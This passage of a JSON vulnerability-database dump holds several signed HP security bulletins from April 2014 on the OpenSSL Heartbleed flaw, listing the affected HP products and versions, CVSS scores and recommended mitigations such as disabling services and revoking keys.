Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNNn1wACgkQ4B86/C0qfVm/sQCg+dFq6zytvlfYlmexvErif+Bg\r\nZooAnRDUeVqwXlt8KEGyQrnGheC43CH0\r\n=6WRm\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30480", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30480", "title": "[security bulletin] HPSBMU02999 rev.1 - HP Software Autonomy WorkSite Server (On-Premises Software), Running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04239372\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04239372\r\nVersion: 1\r\n\r\nHPSBMU02998 rev.1 - HP System Management Homepage (SMH) running OpenSSL on\r\nLinux and Windows, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-13\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP System\r\nManagement Homepage (SMH) running on Linux and Windows. 
This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101501\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP System Management Homepage (SMH). This bulletin will be\r\nrevised when the software updates are released.\r\n\r\nInformation and downloads for HP SMH can be found at the following location:\r\n\r\nhttp://h18013.www1.hp.com/products/servers/management/agents/index.html\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 13 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNK/UsACgkQ4B86/C0qfVnUpACgs06y+OxukBiWTHsJUzFVtUs8\r\naeYAn2YETGkjLUrH6Js44b/Lgl4J2nry\r\n=3CzH\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30477", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30477", "title": "[security bulletin] HPSBMU02998 rev.1 - HP System Management Homepage (SMH) running OpenSSL on Linux and Windows, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04248997\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04248997\r\nVersion: 1\r\n\r\nHPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL\r\nVulnerability, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-16\r\nLast Updated: 2014-04-16\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. 
This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101516)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nService Manager, 9.32 (including all patches), 9.33 (GA,9.33 p1, 9.33-p1-rev1\r\n& 9.33.p2)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNOTE: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00843525\r\n\r\nHP recommends following the Service Manager guidelines and completing the\r\nfollowing action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide. 
To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 16 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. 
To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNPHNsACgkQ4B86/C0qfVmMwQCgi9CnzzUd9g7tjfv9xFQ32BSs\r\nWG0AoPOEoiZs9gYLWbaBwacUhVaC5mGV\r\n=oGCq\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-04-20T00:00:00", "published": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30473", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30473", "title": "[security bulletin] HPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260637\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260637\r\nVersion: 1\r\n\r\nHPSBST03000 rev.1 - HP StoreEver ESL G3 Tape Library and Enterprise Library\r\nLTO-6 Tape Drives running OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security 
Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-22\r\nLast Updated: 2014-04-22\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP StoreEver ESL\r\nG3 Tape Library and Enterprise Library LTO-6 Tape Drives running OpenSSL.\r\nThis is the OpenSSL vulnerability known as "Heartbleed" which could be\r\nexploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101513\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP StoreEver ESL G3 Tape Libraries with MCB rev 2 OpenSSL version1.0.1f for\r\nthe following firmware versions:\r\n\r\n671H_GS00601\r\n665H_GS12501\r\n663H_GS04601\r\n\r\nHP StoreEver ESL G3 Tape Libraries with MCB rev 1 Open SSL version 1.0.1e in\r\n655H firmware versions:\r\n\r\n655H_GS10201\r\n\r\nHP StoreEver Enterprise Library LTO-6 Tape Drives: all firmware versions.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nfirmware versions of HP StoreEver ESL G3 Tape Library and Enterprise Library\r\nLTO-6 Tape Drives. 
This bulletin will be revised when the software updates\r\nare released.\r\n\r\nHP recommends the following mitigation or workaround that can reduce the\r\nlikelihood of an attacker being able to exploit the "Heartbleed"\r\nvulnerability for the HP StoreEver ESL G3 Tape Library and the StoreEver\r\nEnterprise Library LTO-6 Tape Drives:\r\n\r\nThe following configuration options that allow access to the Heartbeat\r\nfunction in the vulnerable versions of OpenSSL are not enabled by default.\r\nVerify that the following options are "disabled" using the Tape Library GUI:\r\n\r\nSecure SMI-S\r\nCVTL User\r\n\r\nNote: disabling these features blocks the vulnerable OpenSSL function in both\r\nthe ESL G3 Tape Library and the StoreEver Enterprise Library LTO-6 Tape\r\nDrives. The basic functionality of the library is not affected by these\r\nconfiguration changes and SSL access to the user interface is not blocked by\r\nthese settings.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 22 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNW3r0ACgkQ4B86/C0qfVldywCgwtbUfxEMhVuvS81AIP12vW0H\r\nw18AoKFRVIVVjcYhdl94betQ8xPal2sU\r\n=MhNP\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30507", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30507", "title": "[security bulletin] HPSBST03000 rev.1 - HP StoreEver ESL G3 Tape Library and Enterprise Library LTO-6 Tape Drives running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04262472\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04262472\r\nVersion: 1\r\n\r\nHPSBMU03020 rev.1 - HP Version Control Agent (VCA) and Version Control\r\nRepository Manager (VCRM) running OpenSSL on Linux and Windows, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-24\r\nLast Updated: 2014-04-24\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Version\r\nControl Agent (VCA) and Version Control Repository Manager (VCRM) running\r\nOpenSSL on Linux and Windows. 
This is the OpenSSL vulnerability known as\r\n"Heartbleed" which could be exploited remotely resulting in disclosure of\r\ninformation.\r\n\r\nReferences: CVE-2014-0160, SSRT101531\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\n\r\nHP Version Control Agent (VCA) v7.2.0, v7.2.1, v7.2.2, v7.3.0, and v7.3.1 for\r\nWindows\r\nHP Version Control Agent (VCA) v7.2.2, v7.3.0, and v7.3.1 for Linux\r\nHP Version Control Repository Manager (VCRM) v7.2.0, v7.2.1, v7.2.2, v7.3.0,\r\nand v7.3.1 for Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nsoftware versions of HP Version Control Agent (VCA) and Version Control\r\nRepository Manager (VCRM). This bulletin will be revised when the software\r\nupdates are released.\r\n\r\nUntil the software updates are available, HP recommends the following\r\nmitigations and workarounds:\r\n\r\nDisable the VCA service name "HP Version Control Agent" on any vulnerable\r\nWindows or Linux server. Disable the VCRM service name "HP Version Control\r\nRepository Manager" on any vulnerable server. 
Typically, the VCRM is\r\ninstalled on a HP Systems Insight Manager server, but may be installed on\r\nanother server.\r\nIf bulk software or firmware updates are required, use an unaffected or\r\npatched version of HP Smart Update Manager (HP SUM) to do single or batch\r\nupdates.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 24 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. 
To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNZRKMACgkQ4B86/C0qfVnRjACcDCv9Sl93QAssH48SvbycVxCr\r\nfdUAn20/zGmeeTJR2L3N6qzFVQ0PXNAh\r\n=JCF2\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30502", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30502", "title": "[security bulletin] HPSBMU03020 rev.1 - HP Version Control Agent (VCA) and Version Control Repository Manager (VCRM) running OpenSSL on Linux and Windows, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04260505\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04260505\r\nVersion: 1\r\n\r\nHPSBMU03018 rev.1 - HP Software Asset Manager running OpenSSL, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this 
Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-21\r\nLast Updated: 2014-04-21\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Software Asset\r\nmanager running OpenSSL. The Heartbleed vulnerability was detected in\r\nspecific OpenSSL versions. OpenSSL is a 3rd party product that is embedded\r\nwith some of HP Software products. This bulletin objective is to notify HP\r\nSoftware customers about products affected by the Heartbleed vulnerability.\r\n\r\nNote: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL product cryptographic software library product. This weakness\r\npotentially allows disclosure of information protected, under normal\r\nconditions, by the SSL/TLS protocol. The impacted products appear in the list\r\nbelow are vulnerable due to embedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101529)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Asset Manager 9.40 (including all patches) HP Cloud System Chargeback 9.40\r\n(including all patches)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNote: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00863578\r\n\r\nHP recommends following Asset Manager guidelines including the following\r\naction items:\r\n\r\nRevocation 
of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide.\r\n\r\nTo learn more about HP Software Incident Response, please visit http://www8.h\r\np.com/us/en/software-solutions/enterprise-software-security-center/response-c\r\nenter.html .\r\n\r\nSoftware updates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 21 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNWbHwACgkQ4B86/C0qfVl2AgCg+g9OYkOXmavhzO8oNrQAqZEC\r\ngnkAoJ7e9mgEcg6wSdzVzykAsNISIB7E\r\n=v1pz\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-01T00:00:00", "published": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30508", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30508", "title": "[security bulletin] HPSBMU03018 rev.1 - HP Software Asset Manager running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "bulletinFamily": "software", "cvelist": ["CVE-2014-0160"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04239375\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04239375\r\nVersion: 1\r\n\r\nHPSBMU02997 rev.1 - HP Smart Update Manager (SUM) running OpenSSL, Remote\r\nDisclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-13\r\nLast Updated: 2014-04-13\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Smart Update\r\nManager (SUM) running OpenSSL.This is the OpenSSL vulnerability known 